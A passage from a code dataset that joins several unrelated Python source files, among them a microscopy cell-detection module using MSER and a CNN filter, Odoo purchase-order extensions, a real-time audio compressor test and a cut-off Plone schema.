Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.ui.sequenceOpen.clicked.connect(sequenceOpen)\n self.ui.sequenceTrain.clicked.connect(createTrainSequence)\n self.ui.sequenceTest.clicked.connect(testNewSequence)\n self.ui.sequenceReset.clicked.connect(sequenceReset)\n\n\nclass TrainSequence:\n def __init__(self):\n self.main_roi = []\n self.train_roi = []\n self.train_sequence = []\n\n\nclass TestSequence:\n def __init__(self):\n self.main_roi = []\n self.test_sequence = []\n\n\ndef sequenceOpen(self):\n if plt.fignum_exists('Sequence Analysis'):\n print('Sequence Analysis window is already open.')\n else:\n plt.figure('Sequence Analysis')\n plt.clf()\n plt.show()\n\n\ndef createTrainSequence():\n # In the final version this function will bring up a UI to select main_roi and train_roi.\n # For now it is just hard-coded.\n dir_path = utils.getDirPath()\n rdl_120 = TrainSequence()\n rdl_120.main_roi = [0, 400, 130, 600]\n rdl_120.train_roi = [[0, 0, 0, 0],\n [175, 305, 170, 280],\n [165, 295, 180, 270],\n [170, 260, 235, 320],\n [150, 240, 245, 340],\n [115, 195, 100, 200],\n [50, 150, 255, 350],\n [70, 160, 255, 455]]\n for _, ((root, _, _), roi) in enumerate(zip(os.walk(dir_path), rdl_120.train_roi)):\n train_subsequence = []\n if root == dir_path:\n continue\n else:\n for image_path in glob.glob(root + '/*.bmp'):\n image = io.imread(image_path)\n crop_image = image[rdl_120.main_roi[0]:rdl_120.main_roi[1],\n rdl_120.main_roi[2]:rdl_120.main_roi[3]]\n train_template = crop_image[roi[0]:roi[1], roi[2]:roi[3]]\n train_subsequence.append(train_template)\n rdl_120.train_sequence.append(train_subsequence)\n utils.saveTrainSequence(rdl_120)\n\n# DEVELOPMENT\ndef ccreateTrainSequence():\n dir_path = utils.getDirPath()\n\n setup_figure = plt.figure('Sequence Setup')\n plt.clf()\n setup_axes = setup_figure.add_subplot(1, 1, 1)\n\n rdl_120 = TrainSequence()\n rdl_120.main_roi = [0, 400, 130, 600]\n rdl_120.train_roi = [0, 0, 0, 0]\n\n for _, ((root, _, _), roi) in enumerate(zip(os.walk(dir_path), rdl_120.train_roi)):\n train_subsequence = []\n if root == dir_path:\n continue\n else:\n toggle_selector.RS = RectangleSelector(setup_axes, line_select_callback,\n drawtype='box', useblit=True,\n # don't use middle button\n button=[1, 3],\n minspanx=5, minspany=5,\n spancoords='pixels',\n interactive=True)\n plt.connect('key_press_event', toggle_selector)\n plt.show()\n utils.saveTrainSequence(rdl_120)\n\n\ndef line_select_callback(eclick, erelease):\n 'eclick and erelease are the press and release events'\n col_1, row_1 = eclick.xdata, eclick.ydata\n col_2, row_2 = erelease.xdata, erelease.ydata\n print(\"(%3.2f, %3.2f) --> (%3.2f, %3.2f)\" % (col_1, row_1, col_2, row_2))\n print(\" The button you used were: %s %s\" %\n (eclick.button, erelease.button))\n\n\ndef toggle_selector(event):\n print(' Key pressed.')\n if event.key in ['Q', 'q'] and toggle_selector.RS.active:\n print(' RectangleSelector deactivated.')\n toggle_selector.RS.set_active(False)\n if event.key in ['A', 'a'] and not toggle_selector.RS.active:\n print(' RectangleSelector activated.')\n toggle_selector.RS.set_active(True)\n\n\ndef createTestSequence():\n dir_path = utils.getDirPath()\n #dir_path = 'C:/Users/dcallaway/Documents/rdl120_sequences/test'\n test_sequence = TestSequence()\n test_sequence.main_roi = [0, 400, 130, 600]\n for _, (root, _, _) in enumerate(os.walk(dir_path)):\n test_subsequence = []\n if root == dir_path:\n continue\n else:\n for image_path in glob.glob(root + '/*.bmp'):\n image = io.imread(image_path)\n crop_image = image[test_sequence.main_roi[0]:test_sequence.main_roi[1],\n test_sequence.main_roi[2]:test_sequence.main_roi[3]]\n test_subsequence.append(crop_image)\n test_sequence.test_sequence.append(test_subsequence)\n return test_sequence\n\n# TODO add sequence pause on fail, but include button to resume sequence\n\n\ndef testNewSequence():\n test_sequence = createTestSequence()\n tic = time.time()\n train_sequence = utils.loadTrainSequence()\n sequence_figure = plt.figure('Sequence Analysis')\n plt.clf()\n sequence_axes = sequence_figure.add_subplot(1, 1, 1)\n match_thresh = 0.92\n loc_thresh = 17\n for i, (template_list, image_list) in enumerate(zip(train_sequence.train_sequence, test_sequence.test_sequence)):\n step_num = i+1\n template_roi = train_sequence.train_roi[step_num]\n print('')\n print('Running step number:', step_num)\n for j, (template, image) in enumerate(zip(template_list, image_list)):\n img_num = j+1\n match_coeff, rect_shape = utils.templateMatch(template, image)\n row_index, col_index, template_width, template_height = rect_shape\n max_loc_diff = utils.locationCheck(template_roi, rect_shape)\n if match_coeff < match_thresh or max_loc_diff > loc_thresh:\n match_rect_face = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=True, facecolor='Blue', alpha=0.2)\n match_rect_edge = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=False, edgecolor='Red', linewidth=3)\n print('')\n print('Match failed!')\n print('Step number:', step_num)\n print('Image number:', img_num)\n if match_coeff < match_thresh:\n print('Match coefficient:', match_coeff)\n if max_loc_diff > loc_thresh:\n print('Max location difference:', max_loc_diff)\n else:\n match_rect_face = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=True, facecolor='Blue', alpha=0.2)\n match_rect_edge = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=False, edgecolor='Green', linewidth=3)\n # print('Match coefficient:', match_coeff)\n sequence_axes.cla()\n sequence_axes.imshow(image)\n sequence_axes.add_patch(match_rect_face)\n sequence_axes.add_patch(match_rect_edge)\n if step_num == len(train_sequence.train_sequence) and img_num == len(template_list):\n print('')\n print('Testing complete!')\n print('Elapsed time:', time.time()-tic)\n plt.show()\n else:\n plt.pause(0.5)\n\n\ndef sequenceReset(self):\n plt.figure('Sequence Analysis')\n plt.clf()\n plt.show()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n mainWin = GlueApp()\n mainWin.show()\n sys.exit(app.exec_())\n","sub_path":"glue_genie/application/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539931500","text":"from odoo import api, fields, models, _\n\n\nclass PurchaseOrder(models.Model):\n _inherit = 'purchase.order'\n\n contract_id = fields.Many2one('purchase.contract', string=\"Purchase Contract\", readonly=True,\n states={'draft': [('readonly', False)]}, )\n purchase_contract_id_line = fields.Many2one('purchase.contract.line', string=\"Purchase Contract Line\",\n states={'draft': [('readonly', False)]},\n readonly=True)\n\n def action_view_invoice(self):\n res = super(PurchaseOrder, self).action_view_invoice()\n for rec in self:\n res['context']['default_contract_id'] = rec.contract_id.id\n return res\n\n def button_cancel(self):\n res = super(PurchaseOrder, self).button_cancel()\n all_qty = []\n for rec in self:\n # rec.purchase_contract_id_line.purchase_created = False\n for line in rec.order_line:\n all_qty.append(line.product_qty)\n # rec.contract_id.ship_qty -= sum(all_qty)\n rec.contract_id.po_qty -= sum(all_qty)\n return res\n\n def button_confirm(self):\n res = super(PurchaseOrder, self).button_confirm()\n all_qty = []\n for rec in self:\n for line in rec.order_line:\n all_qty.append(line.product_qty)\n rec.contract_id.po_qty += sum(all_qty)\n return res\n\n # doaa added\n def btn_advance_payment(self):\n date = ''\n if self.date_approve:\n date = self.date_approve\n if self.date_order:\n date = self.date_order\n ctx = {'default_payment_type': 'outbound',\n 'default_partner_id': self.partner_id.id,\n 'default_partner_type': 'supplier',\n 'search_default_outbound_filter': 1,\n 'res_partner_search_mode': 'supplier',\n 'default_currency_id': self.currency_id.id,\n 'default_payment_date': date,\n 'default_contract_id': self.contract_id.id,\n 'default_purchase_id': self.id,\n 'default_communication': self.name,\n 'default_payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,\n 'active_ids': [],\n 'active_model': self._name,\n 'active_id': self.id,\n }\n\n return {'name': _(\"Advance Payment\"),\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'account.payment',\n 'target': 'new',\n 'view_id': self.env.ref(\n 'xs_purchase_advance_payment.view_purchase_advance_account_payment_form').id,\n 'context': ctx}\n\n\nclass PurchaseOrderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n contract_id = fields.Many2one('purchase.contract', string=\"Purchase Contract\", related='order_id.contract_id',\n readonly=True, store=True)\n purchase_contract_id_line = fields.Many2one('purchase.contract.line', related='order_id.purchase_contract_id_line',\n string=\"Purchase Contract Line\"\n , readonly=True, store=True)\n payment_to_link = fields.Float(sring=\"Payment To Link\")\n account_payment_ids = fields.Many2many('account.payment', string=\"Payments\", compute='compute_account_payment_ids')\n account_payment_id = fields.Many2one('account.payment', string=\"Payments\")\n\n @api.depends('order_id.account_payment_ids', 'contract_id.account_payment_ids')\n def compute_account_payment_ids(self):\n for po_line in self:\n payments_obj = self.env['account.payment'].search([('partner_id', '=', po_line.partner_id.id)])\n payments = []\n # for rec in po_line.order_id.account_payment_ids:\n # payments.append(rec.id)\n for pay in payments_obj:\n payments.append(pay.id)\n po_line.account_payment_ids = [(6, 0, payments)]\n","sub_path":"purchase_contract_management/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73316156","text":"\n\"\"\"\nDescription: Real time dynamic range compression (DRC) (stereo)\n Based on Digital Dynamic Range Compressor Design - A Tutorial and Analysis, Giannoulis et al. 2012\n\nAuthor: Adrien Llave - CentraleSupelec\nDate: 23/02/2018\n\nVersion: 1.0\n\nDate | Auth. | Version | Comments\n23/02/12 ALl 1.0 Initialization\n\n\"\"\"\n\nimport pyaudio\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport src.pkg.RTAudioProc as rt\n\n\nCHANNELS = 2\nRATE = 48000\nsamp_per_buffer = 10\n\ncomp_enable = 1\n\nthrsh = -30\nratio = 10\ntime_attack = 0.005\ntime_release = 2\nkneeWidth = 3\n\np = pyaudio.PyAudio()\n\n\ndef callback(in_data, frame_count, time_info, status):\n\n # ------------------------------------------------------------\n # ----------------- INPUT DECODING\n npdata_in = rt.decode(in_data, CHANNELS)\n\n # ------------------------------------------------------------\n # ----------------- COMPRESSION\n npdata_out = compressor.process(npdata_in)\n # ------------------------------------------------------------\n # ----------------- OUTPUT ENCODING\n data = rt.encode(npdata_out)\n\n return data, pyaudio.paContinue\n\n# ----------------------------------------------------------------\n\n\ncompressor = rt.Compressor(samp_per_buffer, CHANNELS, thrsh, ratio, time_attack, time_release, kneeWidth)\n\n# STREAM\nstream = p.open(format=pyaudio.paInt16,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n # input_device_index=16,\n # output_device_index=16,\n frames_per_buffer=samp_per_buffer,\n stream_callback=callback)\n\nstream.start_stream()\n\ngain_red_db_plt = np.mean(compressor.gain_db, axis=0)\n\nplt.ion()\nfig = plt.figure()\n#\nax = fig.add_subplot(2, 2, 1)\nline1, = ax.plot(gain_red_db_plt, 'ro')\nplt.axis([0, 1, -10, 0])\n#\n# ax2 = fig.add_subplot(222)\n# plt.axis([0, samp_per_buffer, -1, 1])\n# line2, = ax2.plot(npdata_in[:, 1], 'b-')\n#\n# ax3 = fig.add_subplot(223)\n# plt.axis('equal')\n# plt.axis([-60, 0, -60, 0])\n# ax3.grid(color='black', linestyle='-', linewidth=1)\n# line3, = ax3.plot(npdata_in[:, 1], npdata_out[:, 1], 'ro')\n# line4, = ax3.plot(np.arange(-60, 0.0, 1), np.arange(-60, 0.0, 1), '-b')\n\nwhile stream.is_active():\n time.sleep(0.1)\n gain_red_db_plt = np.mean(compressor.gain_db, axis=0)\n # mean_datainp = np.mean(20 * np.log10(np.absolute(npdata_in[:, :] / np.power(2, 16))), axis=0)\n # mean_dataout = np.mean(20 * np.log10(np.absolute(npdata_out[:, :] / np.power(2, 16))), axis=0)\n line1.set_ydata(gain_red_db_plt)\n # line2.set_ydata(npdata_in[:, 0] / np.power(2, 16))\n # line3.set_xdata(mean_datainp)\n # line3.set_ydata(mean_dataout)\n fig.canvas.draw()\n\nstream.stop_stream()\nstream.close()\n\np.terminate()\n\n","sub_path":"RTAudioProc/tests/test_DRC.py","file_name":"test_DRC.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"88177866","text":"from data import dataset\n\n\n# Створити пакет validators та написати функції, що валідують усі дані. Імпорутвати дані функції.\n\nfrom validators.lib import getUserEmail\nfrom validators.lib import getProductPrice\nfrom validators.lib import getProductName\n\n\nfrom task1 import addUserProduct\n\n\n# Написати функцію, що зберігає інформацію про покупку користувачем товару у словник.\n# Усі дані вводить користувач. Використати валідатори. Викликати валідатори\n\ndef addUserProductValidator():\n\n\n\n user_email = getUserEmail()\n while not user_email:\n print('Error')\n user_email = getUserEmail()\n\n\n\n product_name = getProductName()\n while not product_name:\n print('Error')\n product_name = getProductName()\n\n\n\n product_price_str = getProductPrice()\n while not product_price_str :\n print('Error')\n product_price_str = getProductPrice()\n product_price=float(product_price_str)\n\n\n addUserProduct(user_email, product_name, product_price)\n\n\n\nprint(\"Task 2\")\naddUserProductValidator()\nprint(dataset)\n\n\nprint(\"\\n\\n\")","sub_path":"1/programm/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341463744","text":"from __future__ import print_function\nimport os\nimport sys\n\nPWD = os.getcwd()\ntarget_filename = \"2020-01-24-CS:GO---Quick-Configuration.md.hidden\"\ntarget_file = os.path.join(PWD, \"..\", target_filename)\n\ndef main():\n included_bash_cnt = {2, 3}\n\n bash_cnt = 0\n in_bash = False\n with open(target_file) as f:\n for line in f:\n line = line.strip()\n if len(line) == 0 or line[0:2] == \"//\":\n continue\n elif line[0:3] == \"```\":\n if \"bash\" in line:\n bash_cnt += 1\n in_bash = True\n else:\n in_bash = False\n elif in_bash and bash_cnt in included_bash_cnt:\n ind = line.find(\"//\")\n if ind == -1:\n print(line, end=\";\")\n else:\n print(line[:ind].strip(), end=\";\")\n print(\"\\n\\nDone!\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"_posts/.scripts/generate-config.py","file_name":"generate-config.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507485903","text":"\"\"\"\r\nCopyright 2017 Matthew W. Allen\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport time\r\nfrom copy import copy\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport Machine_Learning.Lymphoma.Region_Filter as rFilter\r\n\r\nparams = [11, 68, 236, 0.46394341374428594, 0.20434550448034017, 200, 1, 0.32948156997486944, 5]\r\n\r\n\"\"\"\r\n Function to extract cells from a normalized image taken through holographic microscopy.\r\n @param sourceImage: The hologram image.\r\n @param reference: The reference image for the hologram.\r\n @param params: A tuple containing the parameters for the MSER blob detection algorithm.\r\n @param imName: The name to use when saving the image after cells have been detected.\r\n @param cellName: The beginning of the naming convention for saving individual regions. Should be left as is unless\r\n picking up from a previous detection process.\r\n @param flter: An instance of a Convolutional Neural Network that has been trained to classify small regions\r\n as cells or not cells.\r\n @param show: Flag for displaying the image in a window after cell extraction.\r\n @param classify: Flag to decide whether or not the CNN filter should be used on the regions.\r\n\"\"\"\r\n\r\n\r\ndef extract_regions(sourceImg, reference, params, imName, cellName=\"a0\", flter=None, show=False, classify=False):\r\n t1 = time.time()\r\n sourceImg = sourceImg.astype('float32')\r\n reference = reference.astype('float32')\r\n # Copy normalized image and set it to be what is effectively a bitmap with 1 = np.power(2,16)-1 and 0 = 0.\r\n img = np.divide(sourceImg, reference)\r\n # For all pixels, if a pixel is >= one third of the current maximum pixel value, set it \"on\" at np.power(2,16)-1.\r\n # Otherwise set it \"off\" at 0.\r\n img *= np.power(2, 16) - 1\r\n img = img.astype('uint16')\r\n vis = None\r\n if show or classify:\r\n # Copy of image for display purposes.\r\n vis = sourceImg.copy()\r\n vis = np.divide(vis, 256)\r\n vis = vis.astype('uint8')\r\n vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)\r\n if classify and flter is None:\r\n # Create a filter CNN if none has been passed and classification is necessary.\r\n print(\"Creating filter.\")\r\n flter = rFilter.filter_CNN()\r\n bboxes = []\r\n print(\"Detecting contours...\")\r\n if show:\r\n # Run MSER algorithm on image and save boundary box data for each contour it finds.\r\n hulls = MSER_blobs(img, params, display=vis)\r\n else:\r\n hulls = MSER_blobs(img,params)\r\n\r\n # For all contours detected by MSER.\r\n for cnt in hulls:\r\n # Find and save the minimally sized boundary box around each contour.\r\n x, y, w, h = cv2.boundingRect(cnt)\r\n bboxes.append([x, y, x + w, y + h])\r\n\r\n print(\"Suppressing\",len(bboxes),\"boxes...\")\r\n # Perform non-max suppression on boundary boxes with overlap threshold = 0.2.\r\n bboxes = np.asarray(bboxes)\r\n bboxes = non_max_suppression_fast(bboxes, 0.2)\r\n\r\n # Expand is the number of pixels in width and height the box will increase before cropping.\r\n regions = []\r\n cells = []\r\n name = cellName\r\n print(\"Classifying regions...\")\r\n # For each boundary box.\r\n for box in bboxes:\r\n cellDict = {}\r\n regionDict = {}\r\n name = name_region(name)\r\n # Unpack and reshape the box to be 64x64x1.\r\n x1, y1, x2, y2, cx, cy = reshapeBox(box, (64, 64), sourceImg.shape)\r\n\r\n regionDict[\"coordinates\"] = [cx, cy]\r\n regionDict[\"pixels\"] = np.asarray(sourceImg[y1:y2, x1:x2])\r\n regionDict[\"ref\"] = reference[y1:y2, x1:x2]\r\n regionDict[\"name\"] = name\r\n regions.append(regionDict)\r\n\r\n # Map boundary box coordinates on to original hologram\r\n region = sourceImg[y1:y2, x1:x2]\r\n\r\n if classify:\r\n if flter.classify(region):\r\n cellDict[\"pixels\"] = np.asarray(sourceImg[y1:y2, x1:x2])\r\n\r\n cellDict[\"coordinates\"] = [cx, cy]\r\n cellDict[\"ref\"] = reference[y1:y2, x1:x2]\r\n cellDict[\"name\"] = name\r\n cells.append(cellDict)\r\n #cv2.rectangle(vis, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n cv2.rectangle(vis, (cx, cy), (cx, cy), (255, 0, 0), 5)\r\n elif show:\r\n cv2.rectangle(vis, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n cv2.rectangle(vis, (cx, cy), (cx, cy), (0, 0, 255), 5)\r\n print(\"regions:\", len(regions), \"cells:\", len(cells), \"extraction time:\", time.time() - t1, \"seconds.\")\r\n # Save and display normalized image with boundary boxes shown.\r\n if show:\r\n cv2.imwrite(imName, vis)\r\n cv2.resize(vis,(1920,1080),cv2.INTER_CUBIC)\r\n cv2.imshow(\"Bounding Box Data\", vis)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n # If displaying is not requested, save image with classified regions shown.\r\n #elif classify:\r\n #cv2.imwrite(imName, vis)\r\n return np.asarray(regions), np.asarray(cells), time.time()-t1, vis\r\n\r\n\r\n\"\"\"Wrapper function for extract_regions that uses a pre-determined parameter set for the MSER algorithm.\"\"\"\r\n\r\n\r\ndef get_regions(sourceImage, reference, cellName=\"a0\", imName=\"test.png\", flter=None, show=False, classify=True):\r\n # Parameter set for MSER algorithm. These parameters were found via numerical optimization.\r\n regions, cells, calcTime,vis = extract_regions(sourceImage, reference, params, imName, cellName=cellName, flter=flter, show=show,\r\n classify=classify)\r\n return regions, cells, calcTime,vis\r\n\r\n\r\n\"\"\"\r\n Function to reshape a box defined as (x1,y1,x2,y2) to a desired shape within the boundaries of an image.\r\n @param box: The box to reshape, must be a tuple or list in the format (x1,y2,x2,y2).\r\n @param shape: A tuple or list containing the desired shape of the box, I.E. (64,64).\r\n @param boundaryShape: The shape of the matrix that contains the box to be reshaped, an image in this case. \r\n\"\"\"\r\n\r\n\r\ndef reshapeBox(box, shape, boundaryShape):\r\n # Unpack the box.\r\n x1, y1, x2, y2 = box\r\n # h & w are the maximum x,y coordinates that the box is allowed to attain.\r\n h, w = boundaryShape\r\n # dw & dh are the desired width and height of the box.\r\n dw, dh = shape\r\n\r\n # Calculated the amount that the dimensions of the box will need to be changed\r\n heightExpansion = dh - abs(y1 - y2)\r\n widthExpansion = dw - abs(x1 - x2)\r\n\r\n # Force y1 to be the smallest of the y values. Shift y1 by half of the necessary expansion. Bound y1 to a minimum of 0.\r\n y1 = max(int(round(min(y1, y2) - heightExpansion / 2.)), 0)\r\n\r\n # Force y2 to be the largest of the y values. Shift y2 by half the necessary expansion. Bound y2 to a maximum of h.\r\n y2 = min(int(round(max(y1, y2) + heightExpansion / 2.)), h)\r\n\r\n # These two lines are a repeat of the above y1,y2 calculations but with x and w instead of y and h.\r\n x1 = max(int(round(min(x1, x2) - widthExpansion / 2.)), 0)\r\n x2 = min(int(round(max(x1, x2) + widthExpansion / 2.)), w)\r\n\r\n # Calculate the center point of the newly reshaped box, truncated.\r\n cx = x1 + abs(x1 - x2) // 2\r\n cy = y1 + abs(y1 - y2) // 2\r\n\r\n return x1, y1, x2, y2, cx, cy\r\n\r\n\r\n\"\"\"\r\n Fast non-maximum suppression algorithm by Malisiewicz et al.\r\n @param boxes: Array of boundary boxes to perform non-max suppression on.\r\n @param overlapThresh: Acceptable overlap threshold. 0<=overlapTresh<=1.\r\n\"\"\"\r\n\r\n\r\ndef non_max_suppression_fast(boxes, overlapThresh):\r\n # if there are no boxes, return an empty list\r\n if len(boxes) == 0:\r\n return []\r\n\r\n # if the bounding boxes are integers, convert them to floats --\r\n # this is important since we'll be doing a bunch of divisions\r\n if boxes.dtype.kind == \"i\":\r\n boxes = boxes.astype(\"float\")\r\n\r\n # initialize the list of picked indexes\r\n pick = []\r\n\r\n # grab the coordinates of the bounding boxes\r\n x1 = boxes[:, 0]\r\n y1 = boxes[:, 1]\r\n x2 = boxes[:, 2]\r\n y2 = boxes[:, 3]\r\n\r\n # compute the area of the bounding boxes and sort the bounding\r\n # boxes by the bottom-right y-coordinate of the bounding box\r\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\r\n idxs = np.argsort(y2)\r\n\r\n # keep looping while some indexes still remain in the indexes\r\n # list\r\n while len(idxs) > 0:\r\n # grab the last index in the indexes list and add the\r\n # index value to the list of picked indexes\r\n last = len(idxs) - 1\r\n i = idxs[last]\r\n pick.append(i)\r\n\r\n # find the largest (x, y) coordinates for the start of\r\n # the bounding box and the smallest (x, y) coordinates\r\n # for the end of the bounding box\r\n xx1 = np.maximum(x1[i], x1[idxs[:last]])\r\n yy1 = np.maximum(y1[i], y1[idxs[:last]])\r\n xx2 = np.minimum(x2[i], x2[idxs[:last]])\r\n yy2 = np.minimum(y2[i], y2[idxs[:last]])\r\n\r\n # compute the width and height of the bounding box\r\n w = np.maximum(0, xx2 - xx1 + 1)\r\n h = np.maximum(0, yy2 - yy1 + 1)\r\n\r\n # compute the ratio of overlap\r\n overlap = (w * h) / area[idxs[:last]]\r\n\r\n # delete all indexes from the index list that have\r\n idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlapThresh)[0])))\r\n\r\n # return only the bounding boxes that were picked using the\r\n # integer data type\r\n return boxes[pick].astype(\"int\")\r\n\r\n\r\n\"\"\"\r\n Function to use the MSER algorithm to detect regions in an image.\r\n @param img: Input image for region detection.\r\n @param params: Tuple containing all the parameters for the MSER algorithm.\r\n @param display: Optional image for displaying the contours found by the MSER algorithm.\r\n\"\"\"\r\n\r\n\r\ndef MSER_blobs(img, params, mask=None, display=None):\r\n # Unpack MSER parameters and create MSER object with them.\r\n\r\n delta, minArea, maxArea, maxVariation, minDiversity, maxEvolution, areaThreshold, minMargin, edgeBlurSize = params\r\n\r\n mser = cv2.MSER_create(delta, minArea, maxArea, maxVariation, maxEvolution, areaThreshold, minMargin, edgeBlurSize)\r\n\r\n # Use MSER to detect regions within the given image.\r\n if img.dtype == 'uint16':\r\n img = np.divide(img, 256)\r\n img = img.astype('uint8')\r\n regions, _ = mser.detectRegions(img)\r\n\r\n # Extract the hulls corresponding to the contours found by the MSER algorithm.\r\n hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]\r\n\r\n # Optionally draw the hulls on a display image.\r\n if display is not None:\r\n try:\r\n display = cv2.cvtColor(display, cv2.COLOR_GRAY2BGR)\r\n except:\r\n print(\"Display image correctly formatted.\")\r\n print(len(hulls))\r\n cv2.polylines(display, hulls, 1, (0, 65000, 0))\r\n #cv2.imshow(\"Display Image with MSER hulls\", display)\r\n #cv2.waitKey(0)\r\n #cv2.destroyAllWindows()\r\n #cv2.imwrite(\"MSER Hulls.png\", display)\r\n hulls = np.asarray(hulls)\r\n if display is not None:\r\n return hulls,display\r\n return hulls\r\n\r\ndef name_region(name):\r\n dict = \"abcdefghijklmnopqrstuvwxyz\"\r\n if (name[0] == 'z'):\r\n name = \"a{}\".format(int(name[1:]) + 1)\r\n else:\r\n nextLetter = dict[dict.find(name[0]) + 1]\r\n name = \"{}{}\".format(nextLetter, int(name[1:]))\r\n return name\r\ndef process_folders(workingDirectory):\r\n gen = os.walk(workingDirectory)\r\n dirs = next(gen)[1]\r\n flter = rFilter.filter_CNN()\r\n processedImages = []\r\n for d in dirs:\r\n gen2 = os.walk(''.join([workingDirectory, '/', d]))\r\n refPath = ''.join([workingDirectory,'/',d,'/reference_image.png'])\r\n ref = cv2.imread(refPath,cv2.IMREAD_ANYDEPTH)\r\n for imgName in next(gen2)[2]:\r\n if \".png\" not in imgName or \"reference\" in imgName:\r\n continue\r\n fullFilePath = ''.join([workingDirectory,'/',d,'/',imgName])\r\n filePath = fullFilePath[:fullFilePath.rfind(\".png\")]\r\n print(\"PROCESSING\",fullFilePath)\r\n img = cv2.imread(fullFilePath,cv2.IMREAD_ANYDEPTH)\r\n regions, cells, t, _ = get_regions(img,ref,imName=\"detected.png\",flter=flter,classify=True)\r\n processedImages.append([regions,cells,t,filePath])\r\n return processedImages\r\ndef process_folder(workingDirectory):\r\n processedImages = []\r\n flter = rFilter.filter_CNN()\r\n ref = cv2.imread(''.join([workingDirectory,'/',\"reference_image.png\"]),cv2.IMREAD_ANYDEPTH)\r\n for imgName in os.listdir(workingDirectory):\r\n if \".png\" not in imgName or \"reference\" in imgName:\r\n continue\r\n fullFilePath = ''.join([workingDirectory,'/',imgName])\r\n print(\"PROCESSING\", fullFilePath)\r\n filePath = fullFilePath[:fullFilePath.rfind(\".png\")]\r\n if not os.path.exists(filePath):\r\n os.makedirs(''.join([filePath,'/docs']))\r\n os.makedirs(''.join([filePath,'/detected_image']))\r\n img = cv2.imread(fullFilePath, cv2.IMREAD_ANYDEPTH)\r\n regions, cells, t, _ = get_regions(img, ref, imName=''.join([filePath,'/detected_image/img.png']),flter=flter,classify=True)\r\n processedImages.append([regions, cells, t, filePath])\r\n return processedImages\r\n\r\ndef save_cell_data(workingDirectory, data):\r\n for entry in data:\r\n regions, cells, calcTime, filePath = entry\r\n with open(''.join([filePath,'/docs/cell_counts.txt']), 'w') as file:\r\n file.write(\"Total detected regions = {}\"\r\n \"\\nNumber of detected cells = {}\\n\"\r\n \"Computation Time = {}\".format(len(regions), len(cells),calcTime))\r\n with open(''.join([filePath,'/docs/cell_coordinates.txt']), 'w') as file:\r\n for cell in cells:\r\n file.write(\" ( {} {} )\\n\".format(cell[\"coordinates\"][0], cell[\"coordinates\"][1]))","sub_path":"Partners Healthcare/D3GUI/Machine_Learning/Lymphoma/Region_Detector.py","file_name":"Region_Detector.py","file_ext":"py","file_size_in_byte":14375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346147934","text":"from AccessControl import ClassSecurityInfo\nfrom archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom Products.Archetypes import atapi\nfrom Products.OrderableReferenceField import OrderableReferenceField\nfrom Products.OrderableReferenceField import OrderableReferenceWidget\nfrom Products.minaraad.config import PROJECTNAME\nfrom Products.minaraad.content.contacts import contacts_schema\nfrom Products.minaraad.content.interfaces import IUseContact\nfrom Products.minaraad.ThemeMixin import ThemeParentMixin\nfrom Products.minaraad.interfaces import IMREvent\nfrom Products.minaraad.Attachmentsmixin import Attachmentsmixin\nfrom Products.minaraad.ImageAttachmentsmixin import ImageAttachmentsmixin\nfrom Products.minaraad.utils import list_viewable\nfrom minaraad.projects.content.base_meeting import BaseMeeting\nfrom plone.app.blob.field import ImageField\nfrom zope.interface import implements\n\n\nschema = atapi.Schema((\n\n atapi.TextField(\n name='description',\n widget=atapi.TextAreaWidget(\n label='Description',\n label_msgid='minaraad_label_description',\n i18n_domain='minaraad',\n )\n ),\n\n atapi.StringField(\n name='subheader',\n widget=atapi.StringWidget(\n label='Subheader',\n label_msgid='minaraad_label_subheader',\n i18n_domain='minaraad',\n ),\n searchable=1\n ),\n\n atapi.TextField(\n name='goal',\n allowable_content_types=('text/html', 'text/plain'),\n widget=atapi.RichWidget(\n label='Goal',\n label_msgid='minaraad_label_goal',\n i18n_domain='minaraad',\n ),\n searchable=1,\n default_content_type='text/html',\n default_output_type='text/x-html-safe',\n ),\n\n atapi.StringField(\n name='location',\n widget=atapi.StringWidget(\n label='Location',\n label_msgid='minaraad_label_location',\n i18n_domain='minaraad',\n ),\n searchable=1\n ),\n\n atapi.DateTimeField(\n 